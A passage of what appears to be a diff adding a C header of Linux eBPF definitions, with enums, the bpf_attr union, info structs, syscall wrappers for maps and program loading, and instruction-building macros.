*/ +#define MAX_BPF_REG __MAX_BPF_REG + +struct bpf_insn { + __u8 code; /* opcode */ + __u8 dst_reg:4; /* dest register */ + __u8 src_reg:4; /* source register */ + __s16 off; /* signed offset */ + __s32 imm; /* signed immediate constant */ +}; + +enum bpf_cmd { + BPF_MAP_CREATE, + BPF_MAP_LOOKUP_ELEM, + BPF_MAP_UPDATE_ELEM, + BPF_MAP_DELETE_ELEM, + BPF_MAP_GET_NEXT_KEY, + BPF_PROG_LOAD, + BPF_OBJ_PIN, + BPF_OBJ_GET, + BPF_PROG_ATTACH, + BPF_PROG_DETACH, + BPF_PROG_TEST_RUN, + BPF_PROG_RUN = BPF_PROG_TEST_RUN, + BPF_PROG_GET_NEXT_ID, + BPF_MAP_GET_NEXT_ID, + BPF_PROG_GET_FD_BY_ID, + BPF_MAP_GET_FD_BY_ID, + BPF_OBJ_GET_INFO_BY_FD, + BPF_PROG_QUERY, + BPF_RAW_TRACEPOINT_OPEN, + BPF_BTF_LOAD, + BPF_BTF_GET_FD_BY_ID, + BPF_TASK_FD_QUERY, + BPF_MAP_LOOKUP_AND_DELETE_ELEM, + BPF_MAP_FREEZE, + BPF_BTF_GET_NEXT_ID, + BPF_MAP_LOOKUP_BATCH, + BPF_MAP_LOOKUP_AND_DELETE_BATCH, + BPF_MAP_UPDATE_BATCH, + BPF_MAP_DELETE_BATCH, + BPF_LINK_CREATE, + BPF_LINK_UPDATE, + BPF_LINK_GET_FD_BY_ID, + BPF_LINK_GET_NEXT_ID, + BPF_ENABLE_STATS, + BPF_ITER_CREATE, + BPF_LINK_DETACH, + BPF_PROG_BIND_MAP, +}; + +enum bpf_map_type { + BPF_MAP_TYPE_UNSPEC = 0, + BPF_MAP_TYPE_HASH = 1, + BPF_MAP_TYPE_ARRAY = 2, + BPF_MAP_TYPE_PROG_ARRAY = 3, + BPF_MAP_TYPE_PERF_EVENT_ARRAY = 4, + BPF_MAP_TYPE_PERCPU_HASH = 5, + BPF_MAP_TYPE_PERCPU_ARRAY = 6, + BPF_MAP_TYPE_STACK_TRACE = 7, + BPF_MAP_TYPE_CGROUP_ARRAY = 8, + BPF_MAP_TYPE_LRU_HASH = 9, + BPF_MAP_TYPE_LRU_PERCPU_HASH = 10, + BPF_MAP_TYPE_LPM_TRIE = 11, + BPF_MAP_TYPE_ARRAY_OF_MAPS = 12, + BPF_MAP_TYPE_HASH_OF_MAPS = 13, + BPF_MAP_TYPE_DEVMAP = 14, + BPF_MAP_TYPE_SOCKMAP = 15, + BPF_MAP_TYPE_CPUMAP = 16, + BPF_MAP_TYPE_XSKMAP = 17, + BPF_MAP_TYPE_SOCKHASH = 18, + BPF_MAP_TYPE_CGROUP_STORAGE = 19, + BPF_MAP_TYPE_REUSEPORT_SOCKARRAY = 20, + BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE = 21, + BPF_MAP_TYPE_QUEUE = 22, + BPF_MAP_TYPE_STACK = 23, + BPF_MAP_TYPE_SK_STORAGE = 24, + BPF_MAP_TYPE_DEVMAP_HASH = 25, + BPF_MAP_TYPE_STRUCT_OPS = 26, + BPF_MAP_TYPE_RINGBUF = 27, + BPF_MAP_TYPE_INODE_STORAGE = 28, + BPF_MAP_TYPE_TASK_STORAGE = 29, +}; + +enum bpf_prog_type { + BPF_PROG_TYPE_UNSPEC = 0, + BPF_PROG_TYPE_SOCKET_FILTER = 1, + BPF_PROG_TYPE_KPROBE = 2, + BPF_PROG_TYPE_SCHED_CLS = 3, + BPF_PROG_TYPE_SCHED_ACT = 4, + BPF_PROG_TYPE_TRACEPOINT = 5, + BPF_PROG_TYPE_XDP = 6, + BPF_PROG_TYPE_PERF_EVENT = 7, + BPF_PROG_TYPE_CGROUP_SKB = 8, + BPF_PROG_TYPE_CGROUP_SOCK = 9, + BPF_PROG_TYPE_LWT_IN = 10, + BPF_PROG_TYPE_LWT_OUT = 11, + BPF_PROG_TYPE_LWT_XMIT = 12, + BPF_PROG_TYPE_SOCK_OPS = 13, + BPF_PROG_TYPE_SK_SKB = 14, + BPF_PROG_TYPE_CGROUP_DEVICE = 15, + BPF_PROG_TYPE_SK_MSG = 16, + BPF_PROG_TYPE_RAW_TRACEPOINT = 17, + BPF_PROG_TYPE_CGROUP_SOCK_ADDR = 18, + BPF_PROG_TYPE_LWT_SEG6LOCAL = 19, + BPF_PROG_TYPE_LIRC_MODE2 = 20, + BPF_PROG_TYPE_SK_REUSEPORT = 21, + BPF_PROG_TYPE_FLOW_DISSECTOR = 22, + BPF_PROG_TYPE_CGROUP_SYSCTL = 23, + BPF_PROG_TYPE_RAW_TRACEPOINT_WRITABLE = 24, + BPF_PROG_TYPE_CGROUP_SOCKOPT = 25, + BPF_PROG_TYPE_TRACING = 26, + BPF_PROG_TYPE_STRUCT_OPS = 27, + BPF_PROG_TYPE_EXT = 28, + BPF_PROG_TYPE_LSM = 29, + BPF_PROG_TYPE_SK_LOOKUP = 30, + BPF_PROG_TYPE_SYSCALL = 31, +}; + +enum bpf_attach_type { + BPF_CGROUP_INET_INGRESS = 0, + BPF_CGROUP_INET_EGRESS = 1, + BPF_CGROUP_INET_SOCK_CREATE = 2, + BPF_CGROUP_SOCK_OPS = 3, + BPF_SK_SKB_STREAM_PARSER = 4, + BPF_SK_SKB_STREAM_VERDICT = 5, + BPF_CGROUP_DEVICE = 6, + BPF_SK_MSG_VERDICT = 7, + BPF_CGROUP_INET4_BIND = 8, + BPF_CGROUP_INET6_BIND = 9, + BPF_CGROUP_INET4_CONNECT = 10, + BPF_CGROUP_INET6_CONNECT = 11, + 
BPF_CGROUP_INET4_POST_BIND = 12, + BPF_CGROUP_INET6_POST_BIND = 13, + BPF_CGROUP_UDP4_SENDMSG = 14, + BPF_CGROUP_UDP6_SENDMSG = 15, + BPF_LIRC_MODE2 = 16, + BPF_FLOW_DISSECTOR = 17, + BPF_CGROUP_SYSCTL = 18, + BPF_CGROUP_UDP4_RECVMSG = 19, + BPF_CGROUP_UDP6_RECVMSG = 20, + BPF_CGROUP_GETSOCKOPT = 21, + BPF_CGROUP_SETSOCKOPT = 22, + BPF_TRACE_RAW_TP = 23, + BPF_TRACE_FENTRY = 24, + BPF_TRACE_FEXIT = 25, + BPF_MODIFY_RETURN = 26, + BPF_LSM_MAC = 27, + BPF_TRACE_ITER = 28, + BPF_CGROUP_INET4_GETPEERNAME = 29, + BPF_CGROUP_INET6_GETPEERNAME = 30, + BPF_CGROUP_INET4_GETSOCKNAME = 31, + BPF_CGROUP_INET6_GETSOCKNAME = 32, + BPF_XDP_DEVMAP = 33, + BPF_CGROUP_INET_SOCK_RELEASE = 34, + BPF_XDP_CPUMAP = 35, + BPF_SK_LOOKUP = 36, + BPF_XDP = 37, + BPF_SK_SKB_VERDICT = 38, + BPF_SK_REUSEPORT_SELECT = 39, + BPF_SK_REUSEPORT_SELECT_OR_MIGRATE = 40, + __MAX_BPF_ATTACH_TYPE = 41, +}; + +#define BPF_OBJ_NAME_LEN 16U + +union bpf_attr { + struct { + __u32 map_type; + __u32 key_size; + __u32 value_size; + __u32 max_entries; + __u32 map_flags; + __u32 inner_map_fd; + __u32 numa_node; + char map_name[BPF_OBJ_NAME_LEN]; + __u32 map_ifindex; + __u32 btf_fd; + __u32 btf_key_type_id; + __u32 btf_value_type_id; + __u32 btf_vmlinux_value_type_id; + }; + struct { + __u32 map_fd; + __u64 key; + union { + __u64 value; + __u64 next_key; + }; + __u64 flags; + }; + struct { + __u64 in_batch; + __u64 out_batch; + __u64 keys; + __u64 values; + __u32 count; + __u32 map_fd; + __u64 elem_flags; + __u64 flags; + } batch; + struct { + __u32 prog_type; + __u32 insn_cnt; + __u64 insns; + __u64 license; + __u32 log_level; + __u32 log_size; + __u64 log_buf; + __u32 kern_version; + __u32 prog_flags; + char prog_name[BPF_OBJ_NAME_LEN]; + __u32 prog_ifindex; + __u32 expected_attach_type; + __u32 prog_btf_fd; + __u32 func_info_rec_size; + __u64 func_info; + __u32 func_info_cnt; + __u32 line_info_rec_size; + __u64 line_info; + __u32 line_info_cnt; + __u32 attach_btf_id; + union { + __u32 attach_prog_fd; + __u32 attach_btf_obj_fd; + }; + __u64 fd_array; + }; + struct { + __u64 pathname; + __u32 bpf_fd; + __u32 file_flags; + }; + struct { + __u32 target_fd; + __u32 attach_bpf_fd; + __u32 attach_type; + __u32 attach_flags; + __u32 replace_bpf_fd; + }; + struct { + __u32 prog_fd; + __u32 retval; + __u32 data_size_in; + __u32 data_size_out; + __u64 data_in; + __u64 data_out; + __u32 repeat; + __u32 duration; + __u32 ctx_size_in; + __u32 ctx_size_out; + __u64 ctx_in; + __u64 ctx_out; + __u32 flags; + __u32 cpu; + } test; + struct { + union { + __u32 start_id; + __u32 prog_id; + __u32 map_id; + __u32 btf_id; + __u32 link_id; + }; + __u32 next_id; + __u32 open_flags; + }; + struct { + __u32 bpf_fd; + __u32 info_len; + __u64 info; + } info; + struct { + __u32 target_fd; + __u32 attach_type; + __u32 query_flags; + __u32 attach_flags; + __u64 prog_ids; + __u32 prog_cnt; + } query; + struct { + __u64 name; + __u32 prog_fd; + } raw_tracepoint; + struct { + __u64 btf; + __u64 btf_log_buf; + __u32 btf_size; + __u32 btf_log_size; + __u32 btf_log_level; + }; + struct { + __u32 pid; + __u32 fd; + __u32 flags; + __u32 buf_len; + __u64 buf; + __u32 prog_id; + __u32 fd_type; + __u64 probe_offset; + __u64 probe_addr; + } task_fd_query; + struct { + __u32 prog_fd; + union { + __u32 target_fd; + __u32 target_ifindex; + }; + __u32 attach_type; + __u32 flags; + union { + __u32 target_btf_id; + struct { + __u64 iter_info; + __u32 iter_info_len; + }; + }; + } link_create; + struct { + __u32 link_fd; + __u32 new_prog_fd; + __u32 flags; + __u32 old_prog_fd; + } 
link_update; + struct { + __u32 link_fd; + } link_detach; + struct { + __u32 type; + } enable_stats; + struct { + __u32 link_fd; + __u32 flags; + } iter_create; + struct { + __u32 prog_fd; + __u32 map_fd; + __u32 flags; + } prog_bind_map; +}; + +#define BPF_TAG_SIZE 8 + +struct bpf_prog_info { + __u32 type; + __u32 id; + __u8 tag[BPF_TAG_SIZE]; + __u32 jited_prog_len; + __u32 xlated_prog_len; + __aligned_u64 jited_prog_insns; + __aligned_u64 xlated_prog_insns; + __u64 load_time; /* ns since boottime */ + __u32 created_by_uid; + __u32 nr_map_ids; + __aligned_u64 map_ids; + char name[BPF_OBJ_NAME_LEN]; + __u32 ifindex; + __u32 gpl_compatible:1; + __u32 :31; /* alignment pad */ + __u64 netns_dev; + __u64 netns_ino; + __u32 nr_jited_ksyms; + __u32 nr_jited_func_lens; + __aligned_u64 jited_ksyms; + __aligned_u64 jited_func_lens; + __u32 btf_id; + __u32 func_info_rec_size; + __aligned_u64 func_info; + __u32 nr_func_info; + __u32 nr_line_info; + __aligned_u64 line_info; + __aligned_u64 jited_line_info; + __u32 nr_jited_line_info; + __u32 line_info_rec_size; + __u32 jited_line_info_rec_size; + __u32 nr_prog_tags; + __aligned_u64 prog_tags; + __u64 run_time_ns; + __u64 run_cnt; + __u64 recursion_misses; +} __attribute__((aligned(8))); + +struct bpf_map_info { + __u32 type; + __u32 id; + __u32 key_size; + __u32 value_size; + __u32 max_entries; + __u32 map_flags; + char name[BPF_OBJ_NAME_LEN]; + __u32 ifindex; + __u32 btf_vmlinux_value_type_id; + __u64 netns_dev; + __u64 netns_ino; + __u32 btf_id; + __u32 btf_key_type_id; + __u32 btf_value_type_id; +} __attribute__((aligned(8))); + +struct bpf_btf_info { + __aligned_u64 btf; + __u32 btf_size; + __u32 id; + __aligned_u64 name; + __u32 name_len; + __u32 kernel_btf; +} __attribute__((aligned(8))); + +struct bpf_link_info { + __u32 type; + __u32 id; + __u32 prog_id; + union { + struct { + __aligned_u64 tp_name; /* in/out: tp_name buffer ptr */ + __u32 tp_name_len; /* in/out: tp_name buffer len */ + } raw_tracepoint; + struct { + __u32 attach_type; + __u32 target_obj_id; /* prog_id for PROG_EXT, otherwise btf object id */ + __u32 target_btf_id; /* BTF type id inside the object */ + } tracing; + struct { + __u64 cgroup_id; + __u32 attach_type; + } cgroup; + struct { + __aligned_u64 target_name; /* in/out: target_name buffer ptr */ + __u32 target_name_len; /* in/out: target_name buffer len */ + union { + struct { + __u32 map_id; + } map; + }; + } iter; + struct { + __u32 netns_ino; + __u32 attach_type; + } netns; + struct { + __u32 ifindex; + } xdp; + }; +} __attribute__((aligned(8))); + +enum bpf_func_id { + BPF_FUNC_unspec = 0, + BPF_FUNC_map_lookup_elem = 1, + BPF_FUNC_map_update_elem = 2, + BPF_FUNC_map_delete_elem = 3, + BPF_FUNC_probe_read = 4, + BPF_FUNC_ktime_get_ns = 5, + BPF_FUNC_trace_printk = 6, + BPF_FUNC_get_prandom_u32 = 7, + BPF_FUNC_get_smp_processor_id = 8, + BPF_FUNC_skb_store_bytes = 9, + BPF_FUNC_l3_csum_replace = 10, + BPF_FUNC_l4_csum_replace = 11, + BPF_FUNC_tail_call = 12, + BPF_FUNC_clone_redirect = 13, + BPF_FUNC_get_current_pid_tgid = 14, + BPF_FUNC_get_current_uid_gid = 15, + BPF_FUNC_get_current_comm = 16, + BPF_FUNC_get_cgroup_classid = 17, + BPF_FUNC_skb_vlan_push = 18, + BPF_FUNC_skb_vlan_pop = 19, + BPF_FUNC_skb_get_tunnel_key = 20, + BPF_FUNC_skb_set_tunnel_key = 21, + BPF_FUNC_perf_event_read = 22, + BPF_FUNC_redirect = 23, + BPF_FUNC_get_route_realm = 24, + BPF_FUNC_perf_event_output = 25, + BPF_FUNC_skb_load_bytes = 26, + BPF_FUNC_get_stackid = 27, + BPF_FUNC_csum_diff = 28, + BPF_FUNC_skb_get_tunnel_opt = 29, + 
BPF_FUNC_skb_set_tunnel_opt = 30, + BPF_FUNC_skb_change_proto = 31, + BPF_FUNC_skb_change_type = 32, + BPF_FUNC_skb_under_cgroup = 33, + BPF_FUNC_get_hash_recalc = 34, + BPF_FUNC_get_current_task = 35, + BPF_FUNC_probe_write_user = 36, + BPF_FUNC_current_task_under_cgroup = 37, + BPF_FUNC_skb_change_tail = 38, + BPF_FUNC_skb_pull_data = 39, + BPF_FUNC_csum_update = 40, + BPF_FUNC_set_hash_invalid = 41, + BPF_FUNC_get_numa_node_id = 42, + BPF_FUNC_skb_change_head = 43, + BPF_FUNC_xdp_adjust_head = 44, + BPF_FUNC_probe_read_str = 45, + BPF_FUNC_get_socket_cookie = 46, + BPF_FUNC_get_socket_uid = 47, + BPF_FUNC_set_hash = 48, + BPF_FUNC_setsockopt = 49, + BPF_FUNC_skb_adjust_room = 50, + BPF_FUNC_redirect_map = 51, + BPF_FUNC_sk_redirect_map = 52, + BPF_FUNC_sock_map_update = 53, + BPF_FUNC_xdp_adjust_meta = 54, + BPF_FUNC_perf_event_read_value = 55, + BPF_FUNC_perf_prog_read_value = 56, + BPF_FUNC_getsockopt = 57, + BPF_FUNC_override_return = 58, + BPF_FUNC_sock_ops_cb_flags_set = 59, + BPF_FUNC_msg_redirect_map = 60, + BPF_FUNC_msg_apply_bytes = 61, + BPF_FUNC_msg_cork_bytes = 62, + BPF_FUNC_msg_pull_data = 63, + BPF_FUNC_bind = 64, + BPF_FUNC_xdp_adjust_tail = 65, + BPF_FUNC_skb_get_xfrm_state = 66, + BPF_FUNC_get_stack = 67, + BPF_FUNC_skb_load_bytes_relative = 68, + BPF_FUNC_fib_lookup = 69, + BPF_FUNC_sock_hash_update = 70, + BPF_FUNC_msg_redirect_hash = 71, + BPF_FUNC_sk_redirect_hash = 72, + BPF_FUNC_lwt_push_encap = 73, + BPF_FUNC_lwt_seg6_store_bytes = 74, + BPF_FUNC_lwt_seg6_adjust_srh = 75, + BPF_FUNC_lwt_seg6_action = 76, + BPF_FUNC_rc_repeat = 77, + BPF_FUNC_rc_keydown = 78, + BPF_FUNC_skb_cgroup_id = 79, + BPF_FUNC_get_current_cgroup_id = 80, + BPF_FUNC_get_local_storage = 81, + BPF_FUNC_sk_select_reuseport = 82, + BPF_FUNC_skb_ancestor_cgroup_id = 83, + BPF_FUNC_sk_lookup_tcp = 84, + BPF_FUNC_sk_lookup_udp = 85, + BPF_FUNC_sk_release = 86, + BPF_FUNC_map_push_elem = 87, + BPF_FUNC_map_pop_elem = 88, + BPF_FUNC_map_peek_elem = 89, + BPF_FUNC_msg_push_data = 90, + BPF_FUNC_msg_pop_data = 91, + BPF_FUNC_rc_pointer_rel = 92, + BPF_FUNC_spin_lock = 93, + BPF_FUNC_spin_unlock = 94, + BPF_FUNC_sk_fullsock = 95, + BPF_FUNC_tcp_sock = 96, + BPF_FUNC_skb_ecn_set_ce = 97, + BPF_FUNC_get_listener_sock = 98, + BPF_FUNC_skc_lookup_tcp = 99, + BPF_FUNC_tcp_check_syncookie = 100, + BPF_FUNC_sysctl_get_name = 101, + BPF_FUNC_sysctl_get_current_value = 102, + BPF_FUNC_sysctl_get_new_value = 103, + BPF_FUNC_sysctl_set_new_value = 104, + BPF_FUNC_strtol = 105, + BPF_FUNC_strtoul = 106, + BPF_FUNC_sk_storage_get = 107, + BPF_FUNC_sk_storage_delete = 108, + BPF_FUNC_send_signal = 109, + BPF_FUNC_tcp_gen_syncookie = 110, + BPF_FUNC_skb_output = 111, + BPF_FUNC_probe_read_user = 112, + BPF_FUNC_probe_read_kernel = 113, + BPF_FUNC_probe_read_user_str = 114, + BPF_FUNC_probe_read_kernel_str = 115, + BPF_FUNC_tcp_send_ack = 116, + BPF_FUNC_send_signal_thread = 117, + BPF_FUNC_jiffies64 = 118, + BPF_FUNC_read_branch_records = 119, + BPF_FUNC_get_ns_current_pid_tgid = 120, + BPF_FUNC_xdp_output = 121, + BPF_FUNC_get_netns_cookie = 122, + BPF_FUNC_get_current_ancestor_cgroup_id = 123, + BPF_FUNC_sk_assign = 124, + BPF_FUNC_ktime_get_boot_ns = 125, + BPF_FUNC_seq_printf = 126, + BPF_FUNC_seq_write = 127, + BPF_FUNC_sk_cgroup_id = 128, + BPF_FUNC_sk_ancestor_cgroup_id = 129, + BPF_FUNC_ringbuf_output = 130, + BPF_FUNC_ringbuf_reserve = 131, + BPF_FUNC_ringbuf_submit = 132, + BPF_FUNC_ringbuf_discard = 133, + BPF_FUNC_ringbuf_query = 134, + BPF_FUNC_csum_level = 135, + BPF_FUNC_skc_to_tcp6_sock = 136, + 
BPF_FUNC_skc_to_tcp_sock = 137, + BPF_FUNC_skc_to_tcp_timewait_sock = 138, + BPF_FUNC_skc_to_tcp_request_sock = 139, + BPF_FUNC_skc_to_udp6_sock = 140, + BPF_FUNC_get_task_stack = 141, + BPF_FUNC_load_hdr_opt = 142, + BPF_FUNC_store_hdr_opt = 143, + BPF_FUNC_reserve_hdr_opt = 144, + BPF_FUNC_inode_storage_get = 145, + BPF_FUNC_inode_storage_delete = 146, + BPF_FUNC_d_path = 147, + BPF_FUNC_copy_from_user = 148, + BPF_FUNC_snprintf_btf = 149, + BPF_FUNC_seq_printf_btf = 150, + BPF_FUNC_skb_cgroup_classid = 151, + BPF_FUNC_redirect_neigh = 152, + BPF_FUNC_per_cpu_ptr = 153, + BPF_FUNC_this_cpu_ptr = 154, + BPF_FUNC_redirect_peer = 155, + BPF_FUNC_task_storage_get = 156, + BPF_FUNC_task_storage_delete = 157, + BPF_FUNC_get_current_task_btf = 158, + BPF_FUNC_bprm_opts_set = 159, + BPF_FUNC_ktime_get_coarse_ns = 160, + BPF_FUNC_ima_inode_hash = 161, + BPF_FUNC_sock_from_file = 162, + BPF_FUNC_check_mtu = 163, + BPF_FUNC_for_each_map_elem = 164, + BPF_FUNC_snprintf = 165, + BPF_FUNC_sys_bpf = 166, + BPF_FUNC_btf_find_by_name_kind = 167, + BPF_FUNC_sys_close = 168, + BPF_FUNC_timer_init = 169, + BPF_FUNC_timer_set_callback = 170, + BPF_FUNC_timer_start = 171, + BPF_FUNC_timer_cancel = 172, + BPF_FUNC_get_func_ip = 173, + __BPF_FUNC_MAX_ID = 174, +}; + +static __always_inline int +bpf(int cmd, union bpf_attr *attr, unsigned int size) +{ + return syscall(__NR_bpf, cmd, attr, size); +} + +static __always_inline int +bpf_create_map(enum bpf_map_type map_type, unsigned int key_size, + unsigned int value_size, unsigned int max_entries) +{ + union bpf_attr attr = + { + .map_type = map_type, + .key_size = key_size, + .value_size = value_size, + .max_entries = max_entries, + }; + + return bpf(BPF_MAP_CREATE, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_create_map_with_name(enum bpf_map_type map_type, unsigned int key_size, + unsigned int value_size, unsigned int max_entries, const char* name) +{ + union bpf_attr attr = + { + .map_type = map_type, + .key_size = key_size, + .value_size = value_size, + .max_entries = max_entries, + }; + + strncpy(attr.map_name, name, 0x10); + + return bpf(BPF_MAP_CREATE, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_lookup_elem(int fd, const void *key, void *value) +{ + union bpf_attr attr = { + .map_fd = fd, + .key = (uint64_t)(key), + .value = (uint64_t)(value), + }; + + return bpf(BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_update_elem(int fd, const void *key, const void *value, + uint64_t flags) +{ + union bpf_attr attr = { + .map_fd = fd, + .key = (uint64_t)(key), + .value = (uint64_t)(value), + .flags = flags, + }; + + return bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_delete_elem(int fd, const void *key) +{ + union bpf_attr attr = { + .map_fd = fd, + .key = (uint64_t)(key), + }; + + return bpf(BPF_MAP_DELETE_ELEM, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_obj_get_info_by_fd(int fd, struct bpf_map_info *info) +{ + union bpf_attr attr = { + .info.bpf_fd = fd, + .info.info = (__u64)info, + .info.info_len = sizeof(struct bpf_map_info), + }; + + return bpf(BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr)); +} + +#define LOG_BUF_SIZE 1024*1024 +char bpf_log_buf[LOG_BUF_SIZE]; + +static __always_inline int +bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns, + int insn_cnt, const char *license) +{ + union bpf_attr attr = { + .prog_type = type, + .insns = (uint64_t)(insns), + .insn_cnt = insn_cnt, + .license = (uint64_t)(license), + .log_buf 
= (uint64_t)(bpf_log_buf), + .log_size = LOG_BUF_SIZE, + .log_level = 3, + }; + + return bpf(BPF_PROG_LOAD, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_prog_test_run(int prog_fd, int repeat, void *data, uint32_t size, + void *data_out, unsigned int *size_out, + uint32_t *retval, uint32_t *duration) +{ + union bpf_attr attr; + int ret; + + memset(&attr, 0, sizeof(attr)); + attr.test.prog_fd = prog_fd; + attr.test.data_in = (uint64_t)(data); + attr.test.data_out = (uint64_t)(data_out); + attr.test.data_size_in = size; + attr.test.repeat = repeat; + + ret = bpf(BPF_PROG_TEST_RUN, &attr, sizeof(attr)); + if (size_out) + *size_out = attr.test.data_size_out; + if (retval) + *retval = attr.test.retval; + if (duration) + *duration = attr.test.duration; + return ret; +} + +static __always_inline int +bpf_prog_skb_run(int prog_fd, const void *data, size_t size) +{ + int err, socks[2] = {}; + + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks) != 0) + return errno; + + if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, + &prog_fd, sizeof(prog_fd)) != 0) + { + err = errno; + goto abort; + } + + if (write(socks[1], data, size) != size) + { + err = -1; + goto abort; + } + + err = 0; + +abort: + close(socks[0]); + close(socks[1]); + return err; +} + +/* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */ + +#define BPF_ALU64_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +#define BPF_ALU32_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +/* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */ + +#define BPF_ALU64_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +#define BPF_ALU32_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* Short form of mov, dst_reg = src_reg */ + +#define BPF_MOV64_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +#define BPF_MOV32_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +/* Short form of mov, dst_reg = imm32 */ + +#define BPF_MOV64_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +#define BPF_MOV32_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* BPF_LD_IMM64 macro encodes single 'load 64-bit immediate' insn */ +#define BPF_LD_IMM64(DST, IMM) \ + BPF_LD_IMM64_RAW(DST, 0, IMM) + +#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | BPF_DW | BPF_IMM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = (__u32) (IMM) }), \ + ((struct bpf_insn) { \ + .code = 0, /* zero is reserved opcode */ \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = ((__u64) (IMM)) >> 32 }) + +#ifndef BPF_PSEUDO_MAP_FD +# define BPF_PSEUDO_MAP_FD 1 +#endif + +/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */ +#define BPF_LD_MAP_FD(DST, MAP_FD) \ + 
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) + + +/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */ + +#define BPF_LD_ABS(SIZE, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* Memory load, dst_reg = *(uint *) (src_reg + off16) */ + +#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Memory store, *(uint *) (dst_reg + off16) = src_reg */ + +#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* + * Atomic operations: + * + * BPF_ADD *(uint *) (dst_reg + off16) += src_reg + * BPF_AND *(uint *) (dst_reg + off16) &= src_reg + * BPF_OR *(uint *) (dst_reg + off16) |= src_reg + * BPF_XOR *(uint *) (dst_reg + off16) ^= src_reg + * BPF_ADD | BPF_FETCH src_reg = atomic_fetch_add(dst_reg + off16, src_reg); + * BPF_AND | BPF_FETCH src_reg = atomic_fetch_and(dst_reg + off16, src_reg); + * BPF_OR | BPF_FETCH src_reg = atomic_fetch_or(dst_reg + off16, src_reg); + * BPF_XOR | BPF_FETCH src_reg = atomic_fetch_xor(dst_reg + off16, src_reg); + * BPF_XCHG src_reg = atomic_xchg(dst_reg + off16, src_reg) + * BPF_CMPXCHG r0 = atomic_cmpxchg(dst_reg + off16, r0, src_reg) + */ + +#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = OP }) + +/* Legacy alias */ +#define BPF_STX_XADD(SIZE, DST, SRC, OFF) BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF) + +/* Memory store, *(uint *) (dst_reg + off16) = imm32 */ + +#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) + +/* Conditional jumps against registers, if (dst_reg 'op' src_reg) goto pc + off16 */ + +#define BPF_JMP_REG(OP, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Like BPF_JMP_REG, but with 32-bit wide operands for comparison. */ + +#define BPF_JMP32_REG(OP, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Conditional jumps against immediates, if 